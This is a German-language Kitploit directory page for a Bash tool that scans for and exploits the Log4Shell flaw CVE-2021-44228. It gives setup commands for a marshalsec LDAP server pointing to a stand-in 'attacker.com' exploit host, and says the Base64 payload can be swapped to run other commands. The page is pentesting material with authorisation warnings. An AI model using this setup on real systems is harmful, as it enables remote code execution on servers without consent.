Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Log4j-Scanner-Exploit — Bash-Skript zur Fernidentifikation der Log4j-Schwachstelle CVE-2021-44228. | Kitploit
Tools/GitHubGitHub/julian911015/log4j-scanner-exploit
SchwachstellenscannerPayload-GenerierungExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubjulian911015/log4j-scanner-exploit

Log4j-Scanner-Exploit

Bash-Skript zur Fernidentifikation der Log4j-Schwachstelle CVE-2021-44228.

Repository anzeigen
2vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Log4Shell-Scanner-Exploit

Bash-Skript, das es ermöglicht, die Log4shell-Schwachstelle remote zu identifizieren und/oder auszunutzen. Dieses Tool führt verschiedene Tests mit LDAP-Payloads und den Headern X-Api-Version, User-Agent und X-Forwarded-For durch.

Dieses Skript immer nur mit vorheriger Genehmigung des Eigentümers des geprüften Dienstes/der geprüften Anwendung verwenden.

Abhängigkeiten:

  1. Wir erstellen einen vorkonfigurierten LDAP-Server von Github: https://github.com/mbechler/marshalsec

mvn clean package -DskipTests && Java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar

marshalsec.jndi.LDAPRefServer 'http://attacker.com/#exploit'

  1. Wir aktivieren einen HTTP-Server python3 -m http.server 8080

  2. Java installiert haben #sudo apt install default-jre

  3. Curl installiert haben #sudo apt-get install curl

Anwendungsbeispiel:

Folgende Parameter eingeben:

  • Liste der zu scannenden URLs
  • IP-Adresse des LDAP-Servers
  • Port des LDAP-Servers
  • IP-Adresse des HTTP-Servers
  • Port des HTTP-Servers

#Beispiel Scan einer Anwendung im internen Netzwerk:

  • ./Log4Shell_Scanner.sh <Diccionario_URL> <IP_Servidor_LDAP> <Puerto_Servidor_LDAP> <IP_Servidor_HTTP> <Puerto_Servidor_HTTP>

image

#Beispiel Scan einer Anwendung im Internet:

  • ./Log4Shell_Scanner.sh <Diccionario_URL> <IP_Servidor_LDAP> <Puerto_Servidor_LDAP> <IP_Servidor_HTTP> <Puerto_Servidor_HTTP>

image

Hinweise:

  • Der verwendete Payload sendet den Befehl "ifconfig" an die als verwundbar identifizierten Maschinen. Dieser Payload ist Base64-kodiert und kann geändert werden, um die Exploitationsphase in einem Pentesting-Audit durchzuführen.
  • Wenn das Tool für Internetdienste verwendet werden soll, kann ein Ngrok-Dienst gestartet werden, der ein Port-Forwarding zum lokalen Port des LDAP-Servers durchführt.
  • Dieses Skript immer nur mit vorheriger Genehmigung des Eigentümers des geprüften Dienstes/der geprüften Anwendung verwenden.
Tool herunterladen